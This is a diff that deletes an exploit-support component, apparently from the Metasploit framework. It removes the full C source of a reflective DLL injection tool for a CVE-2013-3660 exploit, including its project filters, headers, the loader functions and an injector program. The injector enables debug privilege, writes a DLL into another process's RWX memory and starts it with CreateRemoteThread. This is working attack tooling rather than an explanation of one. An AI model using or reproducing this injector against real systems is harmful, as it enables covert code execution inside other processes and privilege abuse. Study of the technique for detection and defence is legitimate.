-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="src\GetProcAddressR.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="src\Inject.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="src\LoadLibraryR.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="src\GetProcAddressR.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="src\LoadLibraryR.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="src\ReflectiveDLLInjection.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
deleted file mode 100755
index ef96dcbfbe..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
+++ /dev/null
@@ -1,116 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "GetProcAddressR.h"
-//===============================================================================================//
-// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
-// wont be able to resolve exported addresses in reflectivly loaded librarys.
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
-{
-	UINT_PTR uiLibraryAddress = 0;
-	FARPROC fpResult          = NULL;
-
-	if( hModule == NULL )
-		return NULL;
-
-	// a module handle is really its base address
-	uiLibraryAddress = (UINT_PTR)hModule;
-
-	__try
-	{
-		UINT_PTR uiAddressArray = 0;
-		UINT_PTR uiNameArray    = 0;
-		UINT_PTR uiNameOrdinals = 0;
-		PIMAGE_NT_HEADERS pNtHeaders             = NULL;
-		PIMAGE_DATA_DIRECTORY pDataDirectory     = NULL;
-		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
-			
-		// get the VA of the modules NT Header
-		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
-
-		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-		// get the VA of the export directory
-		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
-			
-		// get the VA for the array of addresses
-		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
-
-		// get the VA for the array of name pointers
-		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
-				
-		// get the VA for the array of name ordinals
-		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
-
-		// test if we are importing by name or by ordinal...
-		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
-		{
-			// import by ordinal...
-
-			// use the import ordinal (- export ordinal base) as an index into the array of addresses
-			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
-
-			// resolve the address for this imported function
-			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
-		}
-		else
-		{
-			// import by name...
-			DWORD dwCounter = pExportDirectory->NumberOfNames;
-			while( dwCounter-- )
-			{
-				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
-				
-				// test if we have a match...
-				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
-				{
-					// use the functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-					
-					// calculate the virtual address for the function
-					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
-					
-					// finish...
-					break;
-				}
-						
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		fpResult = NULL;
-	}
-
-	return fpResult;
-}
-//===============================================================================================//
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
deleted file mode 100755
index 4f5170c31d..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
+++ /dev/null
@@ -1,36 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-#define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/Inject.c b/external/source/exploits/cve-2013-3660/inject/src/Inject.c
deleted file mode 100755
index a7f4a2fee3..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/Inject.c
+++ /dev/null
@@ -1,120 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include "LoadLibraryR.h"
-
-#pragma comment(lib,"Advapi32.lib")
-
-#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
-
-// Simple app to inject a reflective DLL into a process vis its process ID.
-int main( int argc, char * argv[] )
-{
-	HANDLE hFile          = NULL;
-	HANDLE hModule        = NULL;
-	HANDLE hProcess       = NULL;
-	HANDLE hToken         = NULL;
-	LPVOID lpBuffer       = NULL;
-	DWORD dwLength        = 0;
-	DWORD dwBytesRead     = 0;
-	DWORD dwProcessId     = 0;
-	TOKEN_PRIVILEGES priv = {0};
-
-#ifdef WIN_X64
-	char * cpDllFile  = "reflective_dll.x64.dll";
-#else
-#ifdef WIN_X86
-	char * cpDllFile  = "reflective_dll.dll";
-#else WIN_ARM
-	char * cpDllFile  = "reflective_dll.arm.dll";
-#endif
-#endif
-
-	do
-	{
-		// Usage: inject.exe [pid] [dll_file]
-
-		if( argc == 1 )
-			dwProcessId = GetCurrentProcessId();
-		else
-			dwProcessId = atoi( argv[1] );
-
-		if( argc >= 3 )
-			cpDllFile = argv[2];
-
-		hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
-		if( hFile == INVALID_HANDLE_VALUE )
-			BREAK_WITH_ERROR( "Failed to open the DLL file" );
-
-		dwLength = GetFileSize( hFile, NULL );
-		if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
-			BREAK_WITH_ERROR( "Failed to get the DLL file size" );
-
-		lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength );
-		if( !lpBuffer )
-			BREAK_WITH_ERROR( "Failed to get the DLL file size" );
-
-		if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE )
-			BREAK_WITH_ERROR( "Failed to alloc a buffer!" );
-
-		if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
-		{
-			priv.PrivilegeCount           = 1;
-			priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-		
-			if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
-				AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
-
-			CloseHandle( hToken );
-		}
-
-		hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId );
-		if( !hProcess )
-			BREAK_WITH_ERROR( "Failed to open the target process" );
-
-		hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL );
-		if( !hModule )
-			BREAK_WITH_ERROR( "Failed to inject the DLL" );
-
-		printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId );
-		
-		WaitForSingleObject( hModule, -1 );
-
-	} while( 0 );
-
-	if( lpBuffer )
-		HeapFree( GetProcessHeap(), 0, lpBuffer );
-
-	if( hProcess )
-		CloseHandle( hProcess );
-
-	return 0;
-}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
deleted file mode 100755
index db73903ff7..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
+++ /dev/null
@@ -1,234 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "LoadLibraryR.h"
-#include <stdio.h>
-//===============================================================================================//
-DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
-{    
-	WORD wIndex                          = 0;
-	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
-	PIMAGE_NT_HEADERS pNtHeaders         = NULL;
-	
-	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
-
-	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
-
-    if( dwRva < pSectionHeader[0].PointerToRawData )
-        return dwRva;
-
-    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
-    {   
-        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
-           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
-    }
-    
-    return 0;
-}
-//===============================================================================================//
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
-{
-	UINT_PTR uiBaseAddress   = 0;
-	UINT_PTR uiExportDir     = 0;
-	UINT_PTR uiNameArray     = 0;
-	UINT_PTR uiAddressArray  = 0;
-	UINT_PTR uiNameOrdinals  = 0;
-	DWORD dwCounter          = 0;
-#ifdef WIN_X64
-	DWORD dwCompiledArch = 2;
-#else
-	// This will catch Win32 and WinRT.
-	DWORD dwCompiledArch = 1;
-#endif
-
-	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
-
-	// get the File Offset of the modules NT Header
-	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-	// currenlty we can only process a PE file which is the same type as the one this fuction has  
-	// been compiled as, due to various offset in the PE structures being defined at compile time.
-	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
-	{
-		if( dwCompiledArch != 1 )
-			return 0;
-	}
-	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
-	{
-		if( dwCompiledArch != 2 )
-			return 0;
-	}
-	else
-	{
-		return 0;
-	}
-
-	// uiNameArray = the address of the modules export directory entry
-	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-	// get the File Offset of the export directory
-	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
-
-	// get the File Offset for the array of name pointers
-	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
-
-	// get the File Offset for the array of addresses
-	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
-	// get the File Offset for the array of name ordinals
-	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );	
-
-	// get a counter for the number of exported functions...
-	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
-
-	// loop through all the exported functions to find the ReflectiveLoader
-	while( dwCounter-- )
-	{
-		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
-		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
-		{
-			// get the File Offset for the array of addresses
-			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );	
-	
-			// use the functions name ordinal as an index into the array of name pointers
-			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-			// return the File Offset to the ReflectiveLoader() functions code...
-			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
-		}
-		// get the next exported function name
-		uiNameArray += sizeof(DWORD);
-
-		// get the next exported function name ordinal
-		uiNameOrdinals += sizeof(WORD);
-	}
-
-	return 0;
-}
-//===============================================================================================//
-// Loads a DLL image from memory via its exported ReflectiveLoader function
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
-{
-	HMODULE hResult                    = NULL;
-	DWORD dwReflectiveLoaderOffset     = 0;
-	DWORD dwOldProtect1                = 0;
-	DWORD dwOldProtect2                = 0;
-	REFLECTIVELOADER pReflectiveLoader = NULL;
-	DLLMAIN pDllMain                   = NULL;
-
-	if( lpBuffer == NULL || dwLength == 0 )
-		return NULL;
-
-	__try
-	{
-		// check if the library has a ReflectiveLoader...
-		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
-		if( dwReflectiveLoaderOffset != 0 )
-		{
-			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
-
-			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
-			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
-			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
-			{
-				// call the librarys ReflectiveLoader...
-				pDllMain = (DLLMAIN)pReflectiveLoader();
-				if( pDllMain != NULL )
-				{
-					// call the loaded librarys DllMain to get its HMODULE
-					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )	
-						hResult = NULL;
-				}
-				// revert to the previous protection flags...
-				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
-			}
-		}
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		hResult = NULL;
-	}
-
-	return hResult;
-}
-//===============================================================================================//
-// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
-// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 
-//       defined in order to use the correct RDI prototypes.
-// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
-//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
-// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
-// Note: This function currently cant inject accross architectures, but only to architectures which are the 
-//       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
-{
-	BOOL bSuccess                             = FALSE;
-	LPVOID lpRemoteLibraryBuffer              = NULL;
-	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
-	HANDLE hThread                            = NULL;
-	DWORD dwReflectiveLoaderOffset            = 0;
-	DWORD dwThreadId                          = 0;
-
-	__try
-	{
-		do
-		{
-			if( !hProcess  || !lpBuffer || !dwLength )
-				break;
-
-			// check if the library has a ReflectiveLoader...
-			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
-			if( !dwReflectiveLoaderOffset )
-				break;
-
-			// alloc memory (RWX) in the host process for the image...
-			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
-			if( !lpRemoteLibraryBuffer )
-				break;
-
-			// write the image into the host process...
-			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
-				break;
-			
-			// add the offset to ReflectiveLoader() to the remote library address...
-			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
-
-			// create a remote thread in the host process to call the ReflectiveLoader!
-			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
-
-		} while( 0 );
-
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		hThread = NULL;
-	}
-
-	return hThread;
-}
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
deleted file mode 100755
index d8419858a9..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
+++ /dev/null
@@ -1,41 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-#define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
-
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
-
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
deleted file mode 100755
index 27db65dc1b..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#include <windows.h>
-// we declare some common stuff in here...
-
-#define DLL_METASPLOIT_ATTACH	4
-#define DLL_METASPLOIT_DETACH	5
-#define DLL_QUERY_HMODULE		6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
